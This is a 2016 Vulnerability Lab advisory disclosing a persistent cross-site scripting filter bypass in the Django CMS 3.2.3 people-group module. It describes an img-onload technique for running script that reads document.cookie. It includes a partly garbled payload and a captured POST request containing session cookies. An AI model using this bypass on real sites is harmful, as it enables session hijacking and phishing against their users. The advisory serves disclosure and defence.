Document Title: =============== Django CMS v3.2.3 - Filter Bypass & Persistent Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1821 Release Date: ============= 2016-04-14 Vulnerability Laboratory ID (VL-ID): ==================================== 1821 Common Vulnerability Scoring System: ==================================== 3.6 Product & Service Introduction: =============================== django CMS is a modern web publishing platform built with Django, the web application framework for perfectionists with deadlines. django CMS offers out-of-the-box support for the common features you’d expect from a CMS, but can also be easily customised and extended by developers to create a site that is tailored to their precise needs. (Copy of the Homepage: http://docs.django-cms.org/en/3.2.3/index.html ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered an application-side vulnerability in the Django v3.2.3 Content Management System. Vulnerability Disclosure Timeline: ================================== 2016-04-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Divio AG Product: Django Framework - Content Management System 3.2.3 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Django v3.2.3 Content Management System. The security vulnerability allows remote attackers or privileged user accounts to inject own malicious script codes to the application-side of the vulnerable modules web context. The vulnerability has been located in the `people-group-name-1 cms-render-model (people-group-detail)` value of the `/en/footer/people/group/slat/` module POST method request. Remote attackers are able to inject own malicious script code to the group name input to provoke a persistent execution. The injection point is the group add module and the execution point is the `./people/group/slat/` path. The attacker vector of the vulnerability is persistent and request method to inject is POST. The filter validation of the group input disallows the usage of iframes or script code tags. The img tag with source and onload alert (document.cookie / document.domain) allows to bypass the filter validation of the django cms. To inject a splitted char inject is required. The second tag executes the context and bypasses the filter validation of the cms. The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.6. Exploitation of the vulnerability requires a low privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Groups (Add) Vulnerable Parameter(s): [+] people-group-name-1 - cms-render-model (people-group-detail) Affected Module(s): [+] Group List Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers and privileged user accounts with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Payload(s) ">"%20"="">"%20"="">

"><[PERSISTENT INJECTED SCRIPT CODE!!!])<

Status: 302[FOUND] POST http://django.localhost:8080/en/admin/aldryn_people/group/add/?language=en Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[django.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://django.localhost:8080/en/admin/aldryn_people/group/add/?language=en] Cookie[csrftoken=xIKUpMGlX73Z2iwSz4VRTnGh729DwxZI; sessionid=mjq2j02vc7fgp5l50qd3bgdyzjlx2io6; django_language=en] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------11444153422927 Content-Disposition: form-data; name="csrfmiddlewaretoken" xIKUpMGlX73Z2iwSz4VRTnGh729DwxZI -----------------------------11444153422927 Content-Disposition: form-data; name="en" -----------------------------11444153422927 Content-Disposition: form-data; name="name" [PERSISTENT INJECTED SCRIPT CODE VULNERABILITY!] -----------------------------11444153422927 Content-Disposition: form-data; name="slug" [PERSISTENT INJECTED SCRIPT CODE VULNERABILITY!] -----------------------------11444153422927 Content-Disposition: form-data; name="description" [PERSISTENT INJECTED SCRIPT CODE VULNERABILITY!] -----------------------------11444153422927 Content-Disposition: form-data; name="phone" 1337 -----------------------------11444153422927 Content-Disposition: form-data; name="fax" 1337 -----------------------------11444153422927 Content-Disposition: form-data; name="email" -----------------------------11444153422927 Content-Disposition: form-data; name="website" -----------------------------11444153422927 Content-Disposition: form-data; name="address" -----------------------------11444153422927 Content-Disposition: form-data; name="postal_code" -----------------------------11444153422927 Content-Disposition: form-data; name="city" -----------------------------11444153422927 Content-Disposition: form-data; name="_save" Save -----------------------------11444153422927--] Response Header: Transfer-Encoding[chunked] X-Proxy-Request-Received[4] Server[Aldryn-LoadBalancer/2.0] Date[Fri, 08 Apr 2016 20:20:20 GMT] X-Aldryn-App[django-cms-3-2-demo-somijone-stage] X-Proxy-Request-Routed[6] X-Proxy-Request-Forwarded[6] X-Proxy-Response-Received[96] Content-Language[en] Expires[Fri, 08 Apr 2016 20:20:20 GMT] Vary[Cookie] Last-Modified[Fri, 08 Apr 2016 20:20:20 GMT] Location[http://django.localhost:8080/en/admin/aldryn_people/group/] Cache-Control[max-age=0] Content-Type[text/html; charset=utf-8] Set-Cookie[sessionid=mjq2j02vc7fgp5l50qd3bgdyzjlx2io6; expires=Fri, 22-Apr-2016 20:20:20 GMT; Max-Age=1209600; Path=/ messages="b11cb8f5979db37174caeca85e61810b42b79d2a$[["__json_message"540542554"The Group "">